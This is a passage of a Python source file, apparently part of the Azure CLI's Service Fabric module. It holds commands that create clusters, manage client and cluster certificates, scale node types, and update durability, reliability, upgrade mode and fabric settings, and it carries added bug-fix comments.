SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import (StorageAccountCreateParameters)
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = azlogging.get_az_logger(__name__)

# Defaults applied when the caller does not override them.
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
# Default port ranges / endpoints used by the built-in cluster template.
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389

# VM extension names used for Service Fabric node setup.
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"

# ARM template parameter names read/written by this module.
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"

# Friendly OS name -> marketplace image SKU.
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
          'UbuntuServer1604': '16.04-LTS',
          'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
          'WindowsServer2016Datacenter': '2016-Datacenter'}
def list_cluster(client, resource_group_name=None):
    """List Service Fabric clusters, optionally scoped to one resource group."""
    if resource_group_name:
        paged = client.list_by_resource_group(resource_group_name=resource_group_name)
    else:
        paged = client.list()
    return list(paged)
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(client,
                resource_group_name,
                location,
                certificate_subject_name=None,
                parameter_file=None,
                template_file=None,
                cluster_name=None,
                vault_resource_group_name=None,
                vault_name=None,
                certificate_file=None,
                certificate_password=None,
                certificate_output_folder=None,
                secret_identifier=None,
                vm_user_name=None,
                vm_password=None,
                cluster_size=None,
                vm_sku=None,
                vm_os=None):
    """Create a Service Fabric cluster from the built-in ARM template or
    from a user-supplied template/parameter file pair.

    One certificate source must be given: a subject name (a new cert is
    created), a pfx file (imported), or an existing Key Vault secret
    identifier.  Returns a dict with the admin user name, the cluster
    resource and the certificate details used for the deployment.
    """
    if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
        raise CLIError(
            '\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
    if certificate_output_folder and certificate_file:
        raise CLIError(
            '\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
    if secret_identifier:
        # BUG FIX: the original condition tested certificate_output_folder
        # twice (and the message listed it twice); deduplicated here with
        # no behavior change.
        if certificate_output_folder or certificate_file or vault_resource_group_name or certificate_password:
            raise CLIError(
                '\'--certificate-output-folder\', \'--certificate-file\', \'vault_resource_group_name\', \'certificate_password\' can not be specified,' +
                'when \'--secret-identifier\' is specified')
    if parameter_file or template_file:
        # Custom-template deployment: both files are required, and the
        # convenience VM options are owned by the template.
        if parameter_file is None or template_file is None:
            raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
                           '\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
        # NOTE(review): the message below mentions 'vm_os' but the check
        # does not test it; left as-is to avoid rejecting previously
        # accepted input -- confirm intended behavior.
        if cluster_size or vm_sku or vm_user_name:
            raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
    else:
        if vm_password is None:
            raise CLIError('\'--vm-password\' could not be None')
        # Fill in defaults for the built-in template.
        if cluster_size is None:
            cluster_size = DEFAULT_CLUSTER_SIZE
        if vm_sku is None:
            vm_sku = DEFAULT_SKU
        if vm_os is None:
            vm_os = DEFAULT_OS
        if vm_user_name is None:
            vm_user_name = DEFAULT_ADMIN_USER_NAME

    rg = _get_resource_group_name(resource_group_name)
    if rg is None:
        _create_resource_group_name(resource_group_name, location)

    if vault_name is None:
        # Derive a vault name from the resource group name: keep only
        # letters, digits and '-', truncated to 21 characters.
        vault_name = resource_group_name
        name = ""
        for n in vault_name:
            if n.isalpha() or n == '-' or n.isdigit():
                name += n
            if len(name) >= 21:
                break
        vault_name = name
    if vault_resource_group_name is None:
        vault_resource_group_name = resource_group_name
    if cluster_name is None:
        cluster_name = resource_group_name
    if certificate_file:
        filename, file_extension = os.path.splitext(certificate_file)  # pylint: disable=unused-variable
        if file_extension is None or file_extension.lower() != '.pfx'.lower():
            raise CLIError('\'--certificate_file\' should be a valid pfx file')

    import datetime
    suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
    deployment_name = 'AzurePSDeployment-' + suffix

    vault_id = None
    certificate_uri = None
    cert_thumbprint = None
    output_file = None
    if parameter_file is None:
        # Built-in template: create/import the certificate, then fill the
        # default template's parameters.
        vm_os = os_dic[vm_os]
        reliability_level = _get_reliability_level(cluster_size)
        result = _create_certificate(resource_group_name,
                                     certificate_file,
                                     certificate_password,
                                     vault_name,
                                     vault_resource_group_name,
                                     certificate_output_folder,
                                     certificate_subject_name,
                                     secret_identifier)
        vault_id = result[0]
        certificate_uri = result[1]
        cert_thumbprint = result[2]
        output_file = result[3]

        linux = None
        if vm_os == '16.04-LTS':
            linux = True
        template = _modify_template(linux)
        parameters = _set_parameters_for_default_template(cluster_location=location,
                                                          cluster_name=cluster_name,
                                                          admin_password=vm_password,
                                                          certificate_thumbprint=cert_thumbprint,
                                                          vault_id=vault_id,
                                                          certificate_id=certificate_uri,
                                                          reliability_level=reliability_level,
                                                          admin_name=vm_user_name,
                                                          cluster_size=cluster_size,
                                                          durability_level=DEFAULT_DURABILITY_LEVEL,
                                                          vm_sku=vm_sku,
                                                          os_type=vm_os,
                                                          linux=linux)
    else:
        # Custom template: patch the certificate values into the supplied
        # parameter file and load the template as-is.
        parameters, output_file = _set_parameters_for_customize_template(resource_group_name,
                                                                         certificate_file,
                                                                         certificate_password,
                                                                         vault_name,
                                                                         vault_resource_group_name,
                                                                         certificate_output_folder,
                                                                         certificate_subject_name,
                                                                         secret_identifier,
                                                                         parameter_file)
        vault_id = parameters[SOURCE_VAULT_VALUE]['value']
        certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
        cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
        template = get_file_json(template_file)

    # Validate first so template errors surface before any deployment starts.
    logger.info("Validating the deployment")
    validate_result = _deploy_arm_template_core(
        resource_group_name, template, parameters, deployment_name, 'incremental', True)
    if validate_result.error is not None:
        raise CLIError("Template validates error \n'{}'".format(
            validate_result.error))
    logger.info("Deployment is valid, and begin to deploy")
    _deploy_arm_template_core(resource_group_name, template,
                              parameters, deployment_name, 'incremental', False)

    output_dict = {}
    output_dict['vm_user_name'] = vm_user_name
    output_dict['cluster'] = client.get(resource_group_name, cluster_name)
    output_dict['certificate'] = {'certificate_file': output_file,
                                  'vault_id': vault_id,
                                  'certificate_identifier': certificate_uri,
                                  'thumbprint': cert_thumbprint}
    return output_dict
def add_app_cert(client,
                 resource_group_name,
                 cluster_name,
                 certificate_file=None,
                 certificate_password=None,
                 vault_name=None,
                 vault_resource_group_name=None,
                 certificate_output_folder=None,
                 certificate_subject_name=None,
                 secret_identifier=None):
    """Create/import an application certificate and install it on every
    VM scale set backing the cluster; returns the cluster resource."""
    cert_result = _create_certificate(resource_group_name,
                                      certificate_file,
                                      certificate_password,
                                      vault_name,
                                      vault_resource_group_name,
                                      certificate_output_folder,
                                      certificate_subject_name,
                                      secret_identifier)
    vault_id, certificate_uri = cert_result[0], cert_result[1]
    _add_cert_to_all_vmss(resource_group_name, vault_id, certificate_uri)
    return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
                    resource_group_name,
                    cluster_name,
                    is_admin=False,
                    thumbprint=None,
                    certificate_common_name=None,
                    certificate_issuer_thumbprint=None,
                    admin_client_thumbprints=None,
                    readonly_client_thumbprints=None,
                    client_certificate_common_names=None):
    """Add one or more client certificates (by thumbprint or by common name)
    to the cluster and return the update poller.

    Exactly one of the following input styles may be used:
      * thumbprint (optionally with is_admin)
      * certificate_common_name together with certificate_issuer_thumbprint
      * admin_client_thumbprints and/or readonly_client_thumbprints
      * client_certificate_common_names: list of dicts with keys
        'certificateCommonName', 'certificateIssuerThumbprint', 'isAdmin'

    :raises CLIError: when mutually exclusive options are combined or an
        entry in client_certificate_common_names is malformed.
    """
    # --- mutual-exclusion validation -----------------------------------
    if thumbprint:
        if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
            raise CLIError(
                "--thumbprint can only be specified alone or with --is-admin")
    if certificate_common_name or certificate_issuer_thumbprint:
        if certificate_issuer_thumbprint is None or certificate_common_name is None:
            raise CLIError(
                "Both '--certificate-common-name' and '--certificate-issuer-thumbprint' should not be None")
        if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
            raise CLIError(
                "Only '--certificate-common-name' and '--certificate-issuer-thumbprint' can be specified together")
    if admin_client_thumbprints or readonly_client_thumbprints:
        if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
            raise CLIError(
                "Only '--admin-client-thumbprints' and '--readonly-client-thumbprints' can be specified together")
    if client_certificate_common_names:
        if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints:  # pylint: disable=too-many-boolean-expressions
            raise CLIError(
                "'--client-certificate-common-names' can only be specified alone")

    cluster = client.get(resource_group_name, cluster_name)

    def _add_thumbprint(cluster, is_admin, thumbprint):
        # Replace any existing entry with the same thumbprint (case-insensitive).
        duplicates = [t for t in cluster.client_certificate_thumbprints
                      if t.certificate_thumbprint.lower() == thumbprint.lower()]
        for t in duplicates:
            cluster.client_certificate_thumbprints.remove(t)
        cluster.client_certificate_thumbprints.append(
            ClientCertificateThumbprint(is_admin, thumbprint))

    def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
        # Replace any existing entry with the same common name + issuer.
        existing = None  # bug fix: 'remove' was unbound when no match was found
        for t in cluster.client_certificate_common_names:
            if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
                existing = t
        if existing:
            cluster.client_certificate_common_names.remove(existing)
        # bug fix: client_certificate_common_names is a list, so append (not .add)
        cluster.client_certificate_common_names.append(ClientCertificateCommonName(
            is_admin, certificate_common_name, certificate_issuer_thumbprint))
        return cluster.client_certificate_common_names

    if thumbprint:
        _add_thumbprint(cluster, is_admin, thumbprint)
    if admin_client_thumbprints or readonly_client_thumbprints:
        if admin_client_thumbprints:
            for t in admin_client_thumbprints:
                _add_thumbprint(cluster, True, t)
        if readonly_client_thumbprints:
            for t in readonly_client_thumbprints:
                _add_thumbprint(cluster, False, t)
    if certificate_common_name:
        _add_common_name(cluster, is_admin, certificate_common_name,
                         certificate_issuer_thumbprint)
    if client_certificate_common_names:
        for common_name in client_certificate_common_names:
            if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
                cluster.client_certificate_common_names = _add_common_name(
                    cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
            else:
                raise CLIError('client_certificate_common_names is invalid')
    patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
                                            client_certificate_common_names=cluster.client_certificate_common_names)
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
                       resource_group_name,
                       cluster_name,
                       thumbprints=None,
                       certificate_common_name=None,
                       certificate_issuer_thumbprint=None,
                       client_certificate_common_names=None):
    """Remove client certificate(s) from the cluster, matched by thumbprint
    or by common name + issuer thumbprint, and return the update poller.

    Exactly one of the following input styles may be used:
      * thumbprints (single value or list)
      * certificate_common_name together with certificate_issuer_thumbprint
      * client_certificate_common_names: list of dicts with keys
        'certificateCommonName' and 'certificateIssuerThumbprint'

    :raises CLIError: when mutually exclusive options are combined or an
        entry in client_certificate_common_names is malformed.
    """
    if thumbprints:
        if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
            raise CLIError("--thumbprints can only be specified alone")
    if certificate_common_name or certificate_issuer_thumbprint:
        if certificate_issuer_thumbprint is None or certificate_common_name is None:
            raise CLIError(
                "Both '--certificate-common-name' and '--certificate-issuer-thumbprint' should not be None")
        if thumbprints or client_certificate_common_names:
            raise CLIError(
                "Only '--certificate-common-name' and '--certificate-issuer-thumbprint' can be specified together")
    if client_certificate_common_names:
        if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
            raise CLIError(
                "'--client-certificate-common-names' can only be specified alone")
    cluster = client.get(resource_group_name, cluster_name)

    def _remove_thumbprint(cluster, thumbprint):
        # Remove the (last) entry matching the thumbprint, case-insensitively.
        match = None
        for t in cluster.client_certificate_thumbprints:
            if t.certificate_thumbprint.lower() == thumbprint.lower():
                match = t
        if match:
            cluster.client_certificate_thumbprints.remove(match)
        return cluster.client_certificate_thumbprints

    def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
        # Remove the (last) entry matching both common name and issuer.
        match = None
        for t in cluster.client_certificate_common_names:
            if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
                match = t
        if match:
            cluster.client_certificate_common_names.remove(match)
        # bug fix: return the updated list (the original returned the
        # non-existent attribute 'cluster.certificate_issuer_thumbprint')
        return cluster.client_certificate_common_names

    # bug fix: only process thumbprints when given; the original called
    # _remove_thumbprint(cluster, None) whenever --thumbprints was omitted,
    # crashing on None.lower().
    if thumbprints:
        if isinstance(thumbprints, list):
            for t in thumbprints:
                cluster.client_certificate_thumbprints = _remove_thumbprint(
                    cluster, t)
        else:
            _remove_thumbprint(cluster, thumbprints)
    if certificate_common_name:
        _remove_common_name(cluster, certificate_common_name,
                            certificate_issuer_thumbprint)
    if client_certificate_common_names:
        for common_name in client_certificate_common_names:
            if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
                cluster.client_certificate_common_names = _remove_common_name(
                    cluster,
                    common_name['certificateCommonName'],
                    common_name['certificateIssuerThumbprint'])
            else:
                raise CLIError('client_certificate_common_names is invalid')
    patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
                                            client_certificate_common_names=cluster.client_certificate_common_names)
    return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(client,
                     resource_group_name,
                     cluster_name,
                     certificate_file=None,
                     certificate_password=None,
                     vault_name=None,
                     vault_resource_group_name=None,
                     certificate_output_folder=None,
                     certificate_subject_name=None,
                     secret_identifier=None):
    """Add a secondary cluster certificate: provision it in Key Vault, push
    it to the primary node type's scale set, register it as the secondary
    certificate on the Service Fabric extension, and patch the cluster.

    :raises CLIError: if the cluster is unsecured or the Service Fabric
        extension cannot be found on the primary scale set.
    """
    cluster = client.get(resource_group_name, cluster_name)
    if cluster.certificate is None:
        raise CLIError("Unsecure cluster is not allowed to add certificate")
    vault_id, secret_url, thumbprint, _output_file = _create_certificate(
        resource_group_name,
        certificate_file,
        certificate_password,
        vault_name,
        vault_resource_group_name,
        certificate_output_folder,
        certificate_subject_name,
        secret_identifier)
    compute_client = compute_client_factory()
    primary_node_type = [
        n for n in cluster.node_types if n.is_primary is True][0]
    vmss_name = primary_node_type.name
    vmss = compute_client.virtual_machine_scale_sets.get(
        resource_group_name, vmss_name)
    fabric_ext = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
                  if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
    # bug fix: a list comprehension is never None -- check for an empty list
    # so a missing extension raises CLIError instead of IndexError below.
    if not fabric_ext:
        raise CLIError("Failed to find service fabric extension")
    # Register the new certificate as the secondary cert on the SF extension
    # (dict literal replaces the original json.loads-of-a-format-string).
    fabric_ext[0].settings["certificateSecondary"] = {
        'thumbprint': thumbprint, 'x509StoreName': 'my'}
    _add_cert_to_vmss(vmss, resource_group_name, vault_id, secret_url)
    patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
    patch_request.certificate.thumbprint_secondary = thumbprint
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
    """Remove a cluster certificate by thumbprint and patch the cluster.

    If the secondary certificate matches, it is cleared; if the primary
    matches, the secondary (possibly None) is promoted to primary.

    :raises CLIError: if the cluster is unsecured or no certificate with the
        given thumbprint exists.
    """
    cluster = client.get(resource_group_name, cluster_name)
    if cluster.certificate is None:
        raise CLIError("Unsecure cluster is not allowed to remove certificate")
    secondary = cluster.certificate.thumbprint_secondary
    # bug fix: guard against a missing secondary thumbprint -- the original
    # called .lower() on None when no secondary certificate was set.
    if secondary and secondary.lower() == thumbprint.lower():
        cluster.certificate.thumbprint_secondary = None
    elif cluster.certificate.thumbprint.lower() == thumbprint.lower():
        # Removing the primary: promote the secondary into its place.
        cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
        cluster.certificate.thumbprint_secondary = None
    else:
        raise CLIError(
            "Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
    patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
    return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
    """Scale the given node type up by number_of_nodes_to_add VMs and keep
    the cluster's node-type description in sync with the scale set.

    :raises CLIError: if the count is not positive or the node type is not
        found in the cluster.
    """
    number_of_nodes_to_add = int(number_of_nodes_to_add)
    if number_of_nodes_to_add <= 0:
        raise CLIError("--number-of-nodes-to-add must be greater than 0")
    compute_client = compute_client_factory()
    cluster = client.get(resource_group_name, cluster_name)
    node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    # bug fix: a list comprehension is never None -- check for an empty list
    if not node_types:
        raise CLIError("Failed to find the node type in the cluster")
    node_type_desc = node_types[0]
    vmss = compute_client.virtual_machine_scale_sets.get(
        resource_group_name, node_type_desc.name)
    vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
    vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
        resource_group_name, vmss.name, vmss)
    LongRunningOperation()(vmss_poll)
    # Keep the cluster model in sync with the scale set's new capacity.
    node_type_desc.vm_instance_count = vmss.sku.capacity
    patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
    """Scale the given node type down by number_of_nodes_to_remove VMs and
    keep the cluster's node-type description in sync with the scale set.

    :raises CLIError: if the count is not positive, the node type is missing,
        its durability is bronze, or removing would drop a primary node type
        below the instance count its reliability level requires.
    """
    number_of_nodes_to_remove = int(number_of_nodes_to_remove)
    if number_of_nodes_to_remove <= 0:
        raise CLIError("--number-of-nodes-to-remove must be greater than 0")
    compute_client = compute_client_factory()
    cluster = client.get(resource_group_name, cluster_name)
    node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    # bug fix: a list comprehension is never None -- check for an empty list
    if not node_types:
        raise CLIError("Failed to find the node type in the cluster")
    node_type_desc = node_types[0]
    if node_type_desc.durability_level.lower() == 'bronze':
        raise CLIError("Can't delete node if durability level is bronze")
    # Minimum instance count the current reliability level requires.
    reliability_level = _get_target_instance(cluster.reliability_level)
    vmss = compute_client.virtual_machine_scale_sets.get(
        resource_group_name, node_type_desc.name)
    vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
    if node_type_desc.is_primary and vmss.sku.capacity < reliability_level:
        raise CLIError("Can't delete node since current reliability level is {}".format(
            reliability_level))
    vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
        resource_group_name, vmss.name, vmss)
    LongRunningOperation()(vmss_poll)
    node_type_desc.vm_instance_count = vmss.sku.capacity
    patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
    return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(client, resource_group_name, cluster_name, node_type, durability_level):
    """Change the durability level of a node type.

    Updates the Service Fabric VMSS extension and the cluster resource in
    parallel (both are long-running), then returns the refreshed cluster.

    :raises CLIError: if the node type or the Service Fabric extension
        cannot be found.
    """
    cluster = client.get(resource_group_name, cluster_name)
    node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
    # bug fix: a list comprehension is never None -- check for an empty list
    if not node_types:
        raise CLIError("Failed to find the node type in the cluster")
    compute_client = compute_client_factory()
    vmss = compute_client.virtual_machine_scale_sets.get(
        resource_group_name, node_type)
    fabric_exts = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
                   if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
    # bug fix: same -- empty-list check instead of 'is None'
    if not fabric_exts:
        raise CLIError("Failed to find service fabric extension")
    fabric_ext = fabric_exts[0]
    if fabric_ext.settings['durabilityLevel'] == durability_level:
        # Already at the requested level; nothing to do.
        return cluster
    fabric_ext.settings['durabilityLevel'] = durability_level
    fabric_ext.settings['enableParallelJobs'] = True
    vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
        resource_group_name, vmss.name, vmss)
    node_type_desc = node_types[0]  # renamed: original shadowed the parameter
    node_type_desc.durability_level = durability_level
    patch_request = ClusterUpdateParameters(node_types=node_types)
    update_cluster_poll = client.update(
        resource_group_name, cluster_name, patch_request)

    def _wait(poller):
        # Block until the given long-running operation completes.
        return LongRunningOperation()(poller)

    # Wait on both long-running operations concurrently.
    import threading
    t1 = threading.Thread(target=_wait, args=[vmss_poll])
    t2 = threading.Thread(target=_wait, args=[update_cluster_poll])
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
                                resource_group_name,
                                cluster_name,
                                upgrade_mode,
                                version=None):
    """Set the cluster upgrade mode to 'manual' or 'automatic'.

    In manual mode a target cluster code version is mandatory and is written
    into the patch request alongside the mode.
    """
    mode = upgrade_mode.lower()
    if mode not in ('manual', 'automatic'):
        raise CLIError(
            "--upgrade-mode can either be 'manual' or 'automatic'")
    cluster = client.get(resource_group_name, cluster_name)
    patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
    if mode == 'manual':
        if version is None:
            raise CLIError(
                "When '--upgrade-mode' set to 'manual', --version must be given")
        patch_request.cluster_code_version = version
    patch_request.upgrade_mode = upgrade_mode
    return client.update(resource_group_name, cluster_name, patch_request)
def set_cluster_setting(client,
                        resource_group_name,
                        cluster_name,
                        section=None,
                        parameter=None,
                        value=None,
                        settings_section_description=None):
    """Set one or more fabric settings on the cluster.

    Either pass a single section/parameter/value triple, or a list of dicts
    via settings_section_description (keys: 'section', 'parameter', 'value').
    The two styles are mutually exclusive.
    """
    def _apply(settings, sec, param, val):
        # setdefault keeps any other parameters already in the section.
        settings.setdefault(sec, {})[param] = val
        return settings

    if settings_section_description and (section or parameter or value):
        raise CLIError(
            "Only can use either '--settings-section-description' or '--section', '--parameter' and '--value' to set the settings")
    if section or parameter or value:
        if section is None or parameter is None or value is None:
            raise CLIError(
                "'--section' , '--parameter' and '--value' can not be None")
    cluster = client.get(resource_group_name, cluster_name)
    setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
    if settings_section_description:
        for entry in settings_section_description:
            if not ('section' in entry and 'parameter' in entry and 'value' in entry):
                raise CLIError('settings_section_description is invalid')
            setting_dict = _apply(setting_dict, entry['section'],
                                  entry['parameter'], entry['value'])
    else:
        setting_dict = _apply(setting_dict, section, parameter, value)
    settings = _dict_to_fabric_settings(setting_dict)
    patch_request = ClusterUpdateParameters(fabric_settings=settings)
    return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_setting(client,
                           resource_group_name,
                           cluster_name,
                           section=None,
                           parameter=None,
                           settings_section_description=None):
    """Remove one or more fabric settings from the cluster.

    Either pass a single section/parameter pair, or a list of dicts via
    settings_section_description (keys: 'section', 'parameter'). The two
    styles are mutually exclusive.
    """
    def _drop(settings, sec, param):
        # Fail with a friendly message when the section/parameter is unknown.
        if sec not in settings:
            raise CLIError(
                "Can't find the section {} in the settings".format(sec))
        if param not in settings[sec]:
            raise CLIError(
                "Can't find the parameter {} in the settings".format(param))
        del settings[sec][param]
        return settings

    if settings_section_description and (section or parameter):
        raise CLIError(
            "Only can use either '--settings-section-description' or '--section' and '--parameter ' to set the settings")
    cluster = client.get(resource_group_name, cluster_name)
    setting_dict = _fabric_settings_to_dict(cluster.fabric_settings)
    if settings_section_description:
        for entry in settings_section_description:
            if not ('section' in entry and 'parameter' in entry):
                raise CLIError('settings_section_description is invalid')
            setting_dict = _drop(setting_dict, entry['section'], entry['parameter'])
    else:
        setting_dict = _drop(setting_dict, section, parameter)
    settings = _dict_to_fabric_settings(setting_dict)
    patch_request = ClusterUpdateParameters(fabric_settings=settings)
    return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_reliability_level(client,
                                     resource_group_name,
                                     cluster_name, reliability_level,
                                     auto_add_node=False):
    """Change the cluster's reliability level.

    When increasing the level, the primary scale set may need more instances;
    that only happens automatically when auto_add_node is True.

    :raises CLIError: if no primary node type is found, or more nodes are
        required and auto_add_node is False.
    """
    reliability_level = reliability_level.lower()
    cluster = client.get(resource_group_name, cluster_name)
    instance_now = _get_target_instance(cluster.reliability_level)
    instance_target = _get_target_instance(reliability_level)
    node_types = [n for n in cluster.node_types if n.is_primary]
    # bug fix: a list comprehension is never None -- check for an empty list
    if not node_types:
        raise CLIError("Failed to find the node type in the cluster")
    node_type = node_types[0]
    compute_client = compute_client_factory()
    vmss = compute_client.virtual_machine_scale_sets.get(
        resource_group_name, node_type.name)
    if instance_target == instance_now:
        # Already at the requested level; nothing to do.
        return cluster
    if instance_target > instance_now:
        if vmss.sku.capacity < instance_target:
            if not auto_add_node:
                raise CLIError('Please use --auto_add_node to automatically increase the nodes,{} requires {} nodes, but currently there are {}'.
                               format(reliability_level, instance_target, vmss.sku.capacity))
            vmss.sku.capacity = instance_target
            vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
                resource_group_name, vmss.name, vmss)
            LongRunningOperation()(vmss_poll)
            node_type.vm_instance_count = vmss.sku.capacity
    patch_request = ClusterUpdateParameters(
        node_types=node_types, reliability_level=reliability_level)
    return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node_type(client,
                          resource_group_name,
                          cluster_name,
                          node_type,
                          capacity,
                          vm_user_name,
                          vm_password,
                          vm_sku=DEFAULT_SKU,
                          vm_tier=DEFAULT_TIER,
                          durability_level=DEFAULT_DURABILITY_LEVEL):
    """Add a new node type to an existing cluster and return the cluster.

    Steps: patch the cluster resource with the new NodeTypeDescription, carve
    out a fresh /24 subnet in the cluster's virtual network, create a public
    IP + load balancer for the node type, then create the backing VM scale
    set wired up with the Service Fabric (and diagnostics) extensions copied
    from an existing scale set.

    :raises CLIError: on invalid SKU/durability combination, duplicate node
        type name, exhausted address space, or missing SF extension/scale set.
    """
    if durability_level.lower() == 'gold':
        # bug fix: the original compared vm_sku.lower() against mixed-case
        # literals joined with 'or', which always raised for Gold durability.
        if vm_sku.lower() not in ('standard_d15_v2', 'standard_g5'):
            raise CLIError(
                'Only Standard_D15_v2 and Standard_G5 supports Gold durability,please specify -VmSku to right value')
    cluster = client.get(resource_group_name, cluster_name)
    # bug fix: compare both sides lower-cased, and actually format the message.
    if any(n for n in cluster.node_types if n.name.lower() == node_type.lower()):
        raise CLIError("{} already exists in the cluster".format(node_type))
    cluster.node_types.append(
        NodeTypeDescription(name=node_type,
